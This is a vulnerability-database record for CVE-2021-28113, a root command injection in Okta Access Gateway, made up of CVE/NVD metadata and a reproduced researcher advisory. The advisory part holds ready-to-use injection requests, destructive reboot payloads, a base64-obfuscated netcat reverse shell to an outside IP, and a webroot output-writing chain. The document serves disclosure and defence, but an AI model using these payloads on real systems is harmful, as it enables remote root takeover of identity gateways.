CVE-2021-28113 (GCVE-0-2021-28113)

Vulnerability from cvelistv5 – Published: 2021-04-02 14:26 – Updated: 2024-08-03 21:33

Summary

Severity ?

6.7 (Medium)


                        
                          CVSS:3.1/AC:L/AV:N/A:L/C:H/I:H/PR:H/S:U/UI:N

CWE

Assigner

mitre

References

URL

Tags

	https://www.okta.com/security-advisories/cve-2021-28113	x_refsource_CONFIRM
	http://packetstormsecurity.com/files/163428/Okta-…	x_refsource_MISC

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T21:33:17.494Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://www.okta.com/security-advisories/cve-2021-28113"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AC:L/AV:N/A:L/C:H/I:H/PR:H/S:U/UI:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-07-07T17:06:09",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://www.okta.com/security-advisories/cve-2021-28113"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2021-28113",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AC:L/AV:N/A:L/C:H/I:H/PR:H/S:U/UI:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.okta.com/security-advisories/cve-2021-28113",
              "refsource": "CONFIRM",
              "url": "https://www.okta.com/security-advisories/cve-2021-28113"
            },
            {
              "name": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2021-28113",
    "datePublished": "2021-04-02T14:26:52",
    "dateReserved": "2021-03-09T00:00:00",
    "dateUpdated": "2024-08-03T21:33:17.494Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:okta:access_gateway:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"2020.8.4\", \"matchCriteriaId\": \"343753F5-E862-458C-A3F8-887579F836A9\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account.\"}, {\"lang\": \"es\", \"value\": \"Una vulnerabilidad de inyecci\\u00f3n de comandos en los par\\u00e1metros cookieDomain y relayDomain de Okta Access Gateway versiones anteriores a 2020.9.3, permite a atacantes (con acceso de administrador a la interfaz de usuario de Okta Access Gateway) ejecutar comandos del sistema operativo como una cuenta system privilegiada.\"}]",
      "id": "CVE-2021-28113",
      "lastModified": "2024-11-21T05:59:06.290",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"cve@mitre.org\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L\", \"baseScore\": 6.7, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"LOW\"}, \"exploitabilityScore\": 1.2, \"impactScore\": 5.5}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L\", \"baseScore\": 6.7, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"LOW\"}, \"exploitabilityScore\": 1.2, \"impactScore\": 5.5}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:S/C:C/I:C/A:P\", \"baseScore\": 8.7, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"SINGLE\", \"confidentialityImpact\": \"COMPLETE\", \"integrityImpact\": \"COMPLETE\", \"availabilityImpact\": \"PARTIAL\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 8.0, \"impactScore\": 9.5, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2021-04-02T15:15:13.160",
      "references": "[{\"url\": \"http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.okta.com/security-advisories/cve-2021-28113\", \"source\": \"cve@mitre.org\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.okta.com/security-advisories/cve-2021-28113\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}]",
      "sourceIdentifier": "cve@mitre.org",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-78\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2021-28113\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2021-04-02T15:15:13.160\",\"lastModified\":\"2024-11-21T05:59:06.290\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account.\"},{\"lang\":\"es\",\"value\":\"Una vulnerabilidad de inyecci\u00f3n de comandos en los par\u00e1metros cookieDomain y relayDomain de Okta Access Gateway versiones anteriores a 2020.9.3, permite a atacantes (con acceso de administrador a la interfaz de usuario de Okta Access Gateway) ejecutar comandos del sistema operativo como una cuenta system privilegiada.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"cve@mitre.org\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L\",\"baseScore\":6.7,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":1.2,\"impactScore\":5.5},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L\",\"baseScore\":6.7,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":1.2,\"impactScore\":5.5}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:S/C:C/I:C/A:P\",\"baseScore\":8.7,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":8.0,\"impactScore\":9.5,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:okta:access_gateway:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"2020.8.4\",\"matchCriteriaId\":\"343753F5-E862-458C-A3F8-887579F836A9\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.okta.com/security-advisories/cve-2021-28113\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/163428/Okta-Access-Gateway-2020.5.5-Authenticated-Remote-Root.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.okta.com/security-advisories/cve-2021-28113\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]}]}}"
  }
}

VAR-202104-1194

Vulnerability from variot - Updated: 2023-12-18 13:32

A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account. Since the injection occurs when a script is executed with sudo, the commands are ran with root privileges.

BUG #1 - relay

Command injection as root in Applications via the 'relaydomain' field when passing parameters to generateCert.sh. This is blind injection, so without monitoring logs or local execution instrumentation, the output will not simply returned in the response.

Also, the included 'nc' binary that the system image includes has the -e flag available which enables an exploitation easier via connect back shell.

[Request]

POST /api/v1/app/idp/[valid-IDP] HTTP/1.1 Host: gw-admin.domain.tld Content-Type: application/json;charset=utf-8 X-CSRF-TOKEN: [placeholder] Content-Length: 134 Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]

{"settings": {"label":"test", "type":"CERTHEADER2015_APP", "relaydomain":"..$(whoami)", <-- HERE "groups":[], "handlers":{}} ,"policies":[{}]}

[Response /w local instrumentation for monitoring]

pid=23033 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d .root ]

[Quick testing]

"relaydomain":"..$(reboot)"

and the system should reboot.

[Exploitation for reverse shell]

Note: for some bizzare reason, this payload worked for a period of time during testing, but was not generally reproducible afterwards.

1) generate base64 for the connect back command to be executed

$ echo -n "nc 10.0.0.111 5000 -e /bin/bash" | base64 bmMgMTAuMTAuMTAuMTc5IDU1NTUgLWUgL2Jpbi9iYXNo

2) start a listener

$ nc -l -p 5000 ...

3) make the request with the payload (.. is required due to how it parses domains)

..$(echo${IFS}'bmMgMTAuMC4wLjExMSA1MDAwIC1lIC9iaW4vYmFzaA=='>test;$(base64${IFS}-d${IFS}test))

4) get a root shell from the server

connection from 10.0.0.77 * python -c 'import pty; pty.spawn("/bin/bash")'

[0] root@oag.okta.com;/root#

Note: the hostname of the local OAG test system happens to be oag.okta.com and has nothing to do with any Okta company servers.

BUG #2 - cookie

Command injection as root in Identity Providers via the 'cookieDomain' field when passing parameters to generateCert.sh.

[Request]

POST /api/v1/setting/idp/local HTTP/1.1 Host: gw-admin.domain.tld Content-Type: application/json;charset=utf-8 X-CSRF-TOKEN: [placeholder] Content-Length: 222 Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]

{"subCategory": "IDP_SAML_LOCAL", "json":{ "name":"Local OAG IDP", "host":"https://google.com", "cookieDomain":"$(uname${IFS}-n)", <-- HERE "nameIDFormat":"urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified", "metadata":{}}, "$edit":true}

[Response /w local instrumentation for monitoring]

pid=22822 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d Linux oag 3.10.0-957.27.2.el7.x86_64

1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) ]

[Quick testing]

"cookieDomain":"$(reboot)"

and the system should reboot.

[Exploitation for executing commands with output in the webroot]

Same note as the previous one; for some reason, this payload worked for a period of time during testing, but then stopped fully working (the bug was still there just less exploitable).

1) generate base64 for "ls -al /root" to be written to a location accessible via web request

$ echo -n "script -q -c ls\$IFS-al\$IFS/root /opt/oag/simpleSAMLphp/www/test.php" | base64 -w0 c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA==

2) make the request with the payload

$(echo${IFS}'c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA=='>test;$(base64${IFS}-d${IFS}test))

3) check https://gw-admin.domain.tld/auth/test.php for the output of the command

=== Fix ===

The cookie bug was a "known issue" and fixed in v2020.9.3 and the relay bug was also fixed and no longer works on the latest v2021.2.1.

https://www.okta.com/security-advisories/cve-2021-28113/

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202104-1194",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "access gateway",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "okta",
        "version": "2020.8.4"
      },
      {
        "model": "access gateway",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "okta",
        "version": "2020/9/3  before that"
      },
      {
        "model": "access gateway",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "okta",
        "version": null
      },
      {
        "model": "access gateway",
        "scope": null,
        "trust": 0.8,
        "vendor": "okta",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28113"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:okta:access_gateway:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "2020.8.4",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-28113"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jeremy Brown",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163428"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2021-28113",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 8.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "impactScore": 9.5,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 8.7,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2021-28113",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 8.7,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.0,
            "id": "VHN-387508",
            "impactScore": 9.5,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:S/C:C/I:C/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "LOW",
            "baseScore": 6.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "impactScore": 5.5,
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "OTHER",
            "availabilityImpact": "Low",
            "baseScore": 6.7,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2021-005124",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "High",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-28113",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "cve@mitre.org",
            "id": "CVE-2021-28113",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-105",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-387508",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-28113",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-387508"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-28113"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-005124"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28113"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-28113"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-105"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account. \nSince the injection occurs when a script is executed with sudo, the commands are ran with root\nprivileges. \n\nBUG #1 - relay\n\nCommand injection as root in Applications via the \u0027relaydomain\u0027 field when passing\nparameters to generateCert.sh. This is blind injection, so without monitoring logs or\nlocal execution instrumentation, the output will not simply returned in the response. \n\nAlso, the included \u0027nc\u0027 binary that the system image includes has the -e flag available\nwhich enables an exploitation easier via connect back shell. \n\n[Request]\n\nPOST /api/v1/app/idp/[valid-IDP] HTTP/1.1\nHost: gw-admin.domain.tld\nContent-Type: application/json;charset=utf-8\nX-CSRF-TOKEN: [placeholder]\nContent-Length: 134\nCookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]\n\n{\"settings\":\n{\"label\":\"test\",\n\"type\":\"CERTHEADER2015_APP\",\n\"relaydomain\":\"..$(whoami)\", \u003c-- HERE\n\"groups\":[],\n\"handlers\":{}}\n,\"policies\":[{}]}\n\n[Response /w local instrumentation for monitoring]\n\npid=23033 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d .root ]\n\n[Quick testing]\n\n\"relaydomain\":\"..$(reboot)\"\n\nand the system should reboot. \n\n[Exploitation for reverse shell]\n\nNote: for some bizzare reason, this payload worked for a period of time during testing, but was not generally reproducible afterwards. \n\n1) generate base64 for the connect back command to be executed\n\n$ echo -n \"nc 10.0.0.111 5000 -e /bin/bash\" | base64\nbmMgMTAuMTAuMTAuMTc5IDU1NTUgLWUgL2Jpbi9iYXNo\n\n2) start a listener\n\n$ nc -l -p 5000\n... \n\n3) make the request with the payload (.. is required due to how it parses domains)\n\n..$(echo${IFS}\u0027bmMgMTAuMC4wLjExMSA1MDAwIC1lIC9iaW4vYmFzaA==\u0027\u003etest;$(base64${IFS}-d${IFS}test))\n\n4) get a root shell from the server\n\n* connection from 10.0.0.77 *\npython -c \u0027import pty; pty.spawn(\"/bin/bash\")\u0027\n\n[0] root@oag.okta.com;/root#\n\nNote: the hostname of the local OAG test system happens to be oag.okta.com and has nothing to do with any Okta company servers. \n\nBUG #2 - cookie\n\nCommand injection as root in Identity Providers via the \u0027cookieDomain\u0027 field when passing\nparameters to generateCert.sh. \n\n[Request]\n\nPOST /api/v1/setting/idp/local HTTP/1.1\nHost: gw-admin.domain.tld\nContent-Type: application/json;charset=utf-8\nX-CSRF-TOKEN: [placeholder]\nContent-Length: 222\nCookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder]\n\n{\"subCategory\":\n\"IDP_SAML_LOCAL\",\n\"json\":{\n\"name\":\"Local OAG IDP\",\n\"host\":\"https://google.com\",\n\"cookieDomain\":\"$(uname${IFS}-n)\", \u003c-- HERE\n\"nameIDFormat\":\"urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified\",\n\"metadata\":{}},\n\"$edit\":true}\n\n[Response /w local instrumentation for monitoring]\n\npid=22822 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d Linux oag 3.10.0-957.27.2.el7.x86_64\n#1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) ]\n\n[Quick testing]\n\n\"cookieDomain\":\"$(reboot)\"\n\nand the system should reboot. \n\n[Exploitation for executing commands with output in the webroot]\n\nSame note as the previous one; for some reason, this payload worked for a period of time during testing, but then stopped fully working (the bug was still there just less exploitable). \n\n1) generate base64 for \"ls -al /root\" to be written to a location accessible via web request\n\n$ echo -n \"script -q -c ls\\$IFS-al\\$IFS/root /opt/oag/simpleSAMLphp/www/test.php\" | base64 -w0\nc2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA==\n\n2) make the request with the 